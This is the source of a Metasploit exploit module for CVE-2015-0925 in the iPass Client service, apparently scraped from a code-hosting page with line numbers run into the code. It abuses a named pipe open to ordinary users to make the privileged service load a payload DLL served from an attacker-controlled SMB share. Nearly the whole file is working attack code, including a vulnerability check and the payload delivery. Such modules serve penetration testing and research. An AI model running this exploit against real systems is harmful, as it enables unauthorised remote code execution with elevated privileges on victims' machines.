Path: blob/master/modules/exploits/windows/smb/ipass_pipe_exec.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::SMB::Client::Authenticated9include Msf::Exploit::Remote::SMB::Server::Share10include Msf::Exploit::EXE1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'IPass Control Pipe Remote Command Execution',17'Description' => %q{18This module exploits a vulnerability in the IPass Client service. This service provides a19named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused20to force the service to load a DLL from a SMB share.21},22'Author' => [23'Matthias Kaiser', # Vulnerability discovery24'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module25],26'License' => MSF_LICENSE,27'References' => [28[ 'CVE', '2015-0925' ],29[ 'OSVDB', '117423' ],30[ 'BID', '72265' ],31[ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],32],33'DefaultOptions' => {34'EXITFUNC' => 'process',35},36'Payload' => {37'Space' => 2048,38'DisableNops' => true39},40'Platform' => 'win',41'Targets' => [42[ 'Windows x32', { 'Arch' => ARCH_X86 } ],43[ 'Windows x64', { 'Arch' => ARCH_X64 } ]44],45'Privileged' => true,46'DisclosureDate' => '2015-01-21',47'DefaultTarget' => 0,48'Notes' => {49'Reliability' => UNKNOWN_RELIABILITY,50'Stability' => UNKNOWN_STABILITY,51'SideEffects' => UNKNOWN_SIDE_EFFECTS52}53)54)5556register_options(57[58OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])59]60)6162deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')63end6465def check66echo_value = rand_text_alphanumeric(rand(10) + 10)6768begin69response = send_command("System.Echo #{echo_value}")70if response =~ Regexp.new(echo_value)71return Exploit::CheckCode::Vulnerable72else73return Exploit::CheckCode::Unknown74end75rescue Rex::ConnectionError => e76vprint_error("Connection failed: #{e.class}: #{e}")77return Msf::Exploit::CheckCode::Unknown78rescue Rex::Proto::SMB::Exceptions::LoginError => e79vprint_error("Error during login: #{e}")80return Msf::Exploit::CheckCode::Unknown81rescue Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e82vprint_error(e.to_s)83return Msf::Exploit::CheckCode::Unknown84end85end8687def setup88super89self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"90self.share = Rex::Text.rand_text_alpha(5)91end9293def primer94self.file_contents = generate_payload_dll95print_status("File available on #{unc}...")96send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")97end9899def send_command(command)100# The connection is closed after each command, so we have to reopen it101connect102smb_login103pipe = simple.create_pipe('\\IPEFSYSPCPIPE')104pipe.write(Rex::Text.to_unicode(command))105response = Rex::Text.to_ascii(pipe.read)106107response108end109110def exploit111begin112Timeout.timeout(datastore['SMB_DELAY']) { super }113rescue Timeout::Error114# do nothing... just finish exploit and stop smb server...115end116end117end118119120